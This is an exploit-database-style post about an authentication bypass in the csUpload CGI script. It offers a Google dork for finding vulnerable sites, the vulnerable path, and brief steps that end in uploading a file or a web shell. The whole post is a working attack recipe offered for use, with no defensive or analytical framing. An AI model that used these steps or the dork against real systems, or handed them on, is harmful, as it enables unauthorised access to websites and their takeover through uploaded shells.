csUpload Script Site Authentication Bypass

By |April 15th, 2014|

Exploit Title: csUpload Script Site Authentication Bypass
Google Dork: CSUpload.cgi?command=
Date: 4/9/2014
Exploit Author: Satanic2000
Vendor Homepage: http://www.cgiscript.net
Software Link: http://www.cgiscript.net/cgi-script/csNews/csNews.cgi?database=cgi.db&command=viewone&id=12
Tested on: linux
vuln: Site.com/[path]/CSUpload/CSUpload.cgi
[path] : /cgi-script/ or /cgi-bin/ or None
1- http://localhost/cgi-bin/CSUpload//CSUpload.cgi?command=login

2- Bypass Authentication http://localhost/cgi-bin/CSUpload/CSUpload.cgi

3- Select Database Select Databases And Upload (File,Or Shell)
Special tnx S3Ri0uS . Pejvak . l3l4ck.$c0rpi0n And Other Friend